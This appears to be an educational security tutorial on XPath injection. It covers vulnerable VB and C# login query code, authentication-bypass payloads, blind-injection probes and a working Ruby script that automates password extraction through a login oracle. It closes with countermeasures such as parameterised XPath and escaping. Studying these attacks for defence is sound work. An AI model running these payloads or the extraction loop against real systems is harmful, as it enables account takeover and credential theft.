Before we begin, I want to say that I'll spare you the theory in this presentation xD
Summary :
- What is XPath ?
- XPath Injection
- Blind XPath Injection
- XPath Injection Countermeasures
What is XPath ?
XPath is a query language for selecting nodes from an XML document; it treats the XML data as a tree of nodes. There are some similarities between SQL and XPath. XPath 1.0 is a W3C standard and is still the most widely used version; XPath 2.0 is the more recent release. Many languages support XPath, such as Java, JavaScript, the .NET Framework, PHP, Python, Perl and Ruby.
XPath Injection :
Scenario: an authentication system that performs an XPath query built from the submitted username and password.
VB:
Code:
' Vulnerable: the request parameters are concatenated straight into the XPath expression
Dim FindUserXPath As String
FindUserXPath = "//users/user[username/text()='" & Request("Username") & "' and password/text()='" & Request("Password") & "']"
C#:
Code:
// Vulnerable: the same string concatenation in C#
String FindUserXPath;
FindUserXPath = "//users/user[username/text()='" + Request("Username") + "' and password/text()='" + Request("Password") + "']";
With a normal login:
Code:
Username = user
Password = password
XPath query becomes: //users/user[username/text()='user' and password/text()='password']
In this case, injection is possible through the Username variable; the same attack logic as SQL injection applies to XPath.
Code:
Username = user' or '1' = '1
Password = password
XPath query becomes: //users/user[username/text()='user' or '1' = '1' and password/text()='password']
In XPath, and binds more tightly than or, so the predicate is evaluated as username/text()='user' or ('1' = '1' and password/text()='password'). The first alternative is already true for the account named user, so the password clause becomes irrelevant for that account and the attacker is logged in as user without knowing its password. A payload such as x' or '1'='1' or 'a'='a drops the username test as well and matches every user in the file. Either way the authentication check is bypassed. Note that the big difference between an XML file and an SQL database is the lack of access control: XPath places no restrictions on which parts of the XML file a query may touch, so it is possible to retrieve data from the entire document.
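To see both outcomes on a real XPath engine, here is an added example (my code, not code from the original post) in Ruby using the standard REXML library. The users document and the accounts in it are constructed for the example; find_users_vulnerable builds the query exactly as the VB/C# snippets above do.

```ruby
require 'rexml/document'

# Constructed sample user store for the example (not from the original post).
USERS = REXML::Document.new(<<~XML)
  <users>
    <user><username>root</username><password>OAhhgg</password></user>
    <user><username>user</username><password>password</password></user>
  </users>
XML

# Builds the query exactly as the VB/C# snippets above do: the request
# parameters are pasted straight into the XPath expression.
def build_login_xpath(username, password)
  "//users/user[username/text()='#{username}' and password/text()='#{password}']"
end

# Returns the usernames of every <user> the vulnerable query matches.
# A real application would log in the first one it gets back.
def find_users_vulnerable(username, password)
  REXML::XPath.match(USERS, build_login_xpath(username, password))
              .map { |u| u.elements['username'].text }
end

# The page's payload. Because 'and' binds tighter than 'or', the predicate
# is read as  username='user' OR ('1'='1' AND password='wrong'), which is
# true for the account named "user" whatever the password is.
BYPASS_ONE_USER = "user' or '1' = '1"

# A second 'or' clause lets the tautology stand on its own, so the
# predicate is true for every <user> in the file.
BYPASS_ALL_USERS = "x' or '1'='1' or 'a'='a"

if __FILE__ == $PROGRAM_NAME
  puts build_login_xpath(BYPASS_ONE_USER, 'wrong')
  p find_users_vulnerable('root', 'OAhhgg')           # legitimate login
  p find_users_vulnerable('root', 'wrong')            # wrong password
  p find_users_vulnerable(BYPASS_ONE_USER, 'wrong')   # logs in as "user"
  p find_users_vulnerable(BYPASS_ALL_USERS, 'wrong')  # every user
end
```

Run it with `ruby xpath_bypass.rb`: the first payload returns only the user named user, the second returns the whole user list, which is the difference the precedence of and over or makes.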
Blind XPath Injection
XPath 1.0 has no comment syntax, so the attacker cannot comment out the rest of the expression as with -- in SQL. Instead the injected payload ends with an always-false alternative such as or 'a'='b, so that the remainder of the original expression is absorbed and the whole query stays syntactically valid.
Original XPath Request:
Code:
Username = user
Password = password
XPath query becomes: //users/user[username/text()='user' and password/text()='password']
1) Extracting the XML file structure (confirming that a "username" node exists):
Code:
Username = jjj' or name(//users/user/username[1]) = 'username' or 'a'='b
Password = password
XPath query becomes: //users/user[username/text()='jjj' or name(//users/user/username[1]) = 'username' or 'a'='b' and password/text()='password']
Assuming no account is named jjj, the first alternative is false and the last one is always false, so the login succeeds exactly when the middle condition is true, i.e. when the first child of user really is an element called username.
2) Given valid credentials for one user, the attacker can AND extra TRUE/FALSE conditions onto that known-good login and read the answer from whether the login still succeeds. Here the login succeeds only if the first character of the first child node of the second user element is "a":
Code:
Username = root' and substring((//user[position()=2]/child::node()[position()=1]),1,1)="a" and '1' = '1
Password = OAhhgg
XPath query becomes: //users/user[username/text()='root' and substring((//user[position()=2]/child::node()[position()=1]),1,1)="a" and '1' = '1' and password/text()='OAhhgg']
With the users/user/username, password layout used above, that first child node is the username rather than the password; to read the password, address it by name (//user[position()=2]/password) or by position()=2, and remember that in an indented file the whitespace text nodes between elements also count as child nodes and shift the positions.
This blind XPath injection can also make use of the functions contains and string-length and the related string functions. In this case AND must be used, so that every condition in the predicate has to be true.
Other XML crawling techniques that can be used :
Return the number of child nodes under the user elements (text nodes included), which tells the attacker how much there is to enumerate:
Code:
count(//user/child::node())
Return True if the length of the first username element is exactly 4 characters:
Code:
string-length(//username[position()=1]/child::node()[position()=1])=4
Return True if the first username element contains the string "r":
Code:
contains(//username[position()=1]/child::node()[position()=1],"r")
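The probes in steps 1) and 2) and the crawling functions above are the building blocks of a full blind extraction. The following added example (my code, not the original post's) in Ruby with REXML turns the boolean login oracle into a loop that recovers a whole string: string-length() to learn the length, substring() to recover each character, and count() to size the node set. The users document is constructed for the example, and the target is addressed as //users/user[2]/password rather than child::node()[position()=1], because in this layout the latter selects the username (or a whitespace text node).

```ruby
require 'rexml/document'

# Constructed sample user store for the example (not from the original post).
USERS = REXML::Document.new(<<~XML)
  <users>
    <user><username>root</username><password>OAhhgg</password></user>
    <user><username>user</username><password>password</password></user>
  </users>
XML

# All the attacker gets to observe: did the login succeed? The query is the
# same concatenated expression as in the page's VB/C# snippets.
def login_ok?(username, password)
  xpath = "//users/user[username/text()='#{username}' and password/text()='#{password}']"
  !REXML::XPath.match(USERS, xpath).empty?
end

# Credentials the attacker already holds (the page's scenario). Keeping them
# valid makes the known part of the predicate true, so the login succeeds
# exactly when the AND-ed attacker condition is true as well.
KNOWN_USER = 'root'
KNOWN_PASS = 'OAhhgg'

# One yes/no question to the application, e.g.
# oracle("substring(//users/user[2]/username,1,1)='u'")
def oracle(condition)
  login_ok?("#{KNOWN_USER}' and #{condition} and '1'='1", KNOWN_PASS)
end

# Step 1: learn the length of the target string with string-length().
def probe_length(target_expr, max = 64)
  (0..max).find { |n| oracle("string-length(#{target_expr})=#{n}") }
end

# Step 2: recover the string one character at a time with substring().
# Characters outside the alphabet show up as '?'.
DEFAULT_ALPHABET = ('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a

def extract_string(target_expr, alphabet = DEFAULT_ALPHABET)
  len = probe_length(target_expr)
  return nil if len.nil?
  (1..len).map do |i|
    alphabet.find { |ch| oracle("substring(#{target_expr},#{i},1)='#{ch}'") } || '?'
  end.join
end

# Step 3: count() tells the attacker how many nodes there are to crawl.
def count_nodes(node_expr, max = 64)
  (0..max).find { |n| oracle("count(#{node_expr})=#{n}") }
end

if __FILE__ == $PROGRAM_NAME
  p count_nodes('//users/user')                 # 2
  p probe_length('//users/user[2]/password')    # 8
  p extract_string('//users/user[2]/password')  # "password"
end
```

Each character costs at most one request per alphabet entry; against a real target you would replace login_ok? with an HTTP request and check the response for the "logged in" marker, and the rest of the loop stays the same.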
XPath Injection Countermeasures
Input validation: always validate and filter input and escape output; in particular, treat single and double quotes as XPath string delimiters that must be rejected or escaped before the value reaches the query.
Parameterisation: it is possible to parameterise the expressions that are passed to the XPath parser for dynamic execution at run time, so that user input is bound as a variable instead of being concatenated into the expression.
The query can also be parameterised by creating an external file and using XQuery to query the file.
Precompiled XPath: use precompiled XPath expressions. If you are using .NET, consider the Dynamic Context library by Daniel Cazzulino, which resolves $name and $password from XPathVariable objects rather than from string concatenation:
Code:
XPathNodeIterator custData = XPathCache.Select(
    "//customer[@name=$name and @password=$password]",
    customersDocument,
    new XPathVariable("name", txtName.Text),
    new XPathVariable("password", txtPassword.Text));
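An added example (my code, not from the original post) of the same countermeasures in Ruby with REXML, whose XPath.match accepts a variables hash much like XPathCache accepts XPathVariable objects: the query text is fixed and the credentials are bound as $name and $password. Also shown is an xpath_literal helper (my own, an assumption about how to escape when the API only takes a string) that wraps a value in a safe XPath string literal, falling back to concat() because XPath 1.0 has no escape character. The users document is constructed for the example.

```ruby
require 'rexml/document'

# Constructed sample user store for the example (not from the original post).
USERS = REXML::Document.new(<<~XML)
  <users>
    <user><username>root</username><password>OAhhgg</password></user>
    <user><username>user</username><password>password</password></user>
  </users>
XML

# Preferred fix: a fixed expression with XPath variables. REXML substitutes
# $name and $password from the variables hash, so a quote in the input is
# data, never syntax (the REXML counterpart of XPathCache + XPathVariable).
SAFE_LOGIN_XPATH = '//users/user[username/text()=$name and password/text()=$password]'

def find_users_param(username, password)
  REXML::XPath.match(USERS, SAFE_LOGIN_XPATH, nil,
                     { 'name' => username, 'password' => password })
              .map { |u| u.elements['username'].text }
end

# Fallback when the API only takes a string: wrap the value in a safe XPath
# string literal. XPath 1.0 has no escape character, so a value containing
# both kinds of quote has to be assembled with concat().
def xpath_literal(value)
  return "'#{value}'" unless value.include?("'")
  return "\"#{value}\"" unless value.include?('"')
  parts = value.split("'", -1).map { |part| "'#{part}'" }
  "concat(#{parts.join(%q{, "'", })})"
end

def find_users_escaped(username, password)
  xpath = "//users/user[username/text()=#{xpath_literal(username)} " \
          "and password/text()=#{xpath_literal(password)}]"
  REXML::XPath.match(USERS, xpath).map { |u| u.elements['username'].text }
end

if __FILE__ == $PROGRAM_NAME
  p find_users_param('root', 'OAhhgg')                       # ["root"]
  p find_users_param("user' or '1' = '1", 'wrong')           # []
  p find_users_escaped("x' or '1'='1' or 'a'='a", 'wrong')   # []
  puts xpath_literal(%q{a'b"c})                              # concat('a', "'", 'b"c')
end
```

Prefer the variable form wherever the engine offers it; the literal-building form is only for APIs that take a finished string, and it must be applied to every interpolated value, not just the ones you expect to contain quotes.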
©2012, copyright BLACK BURN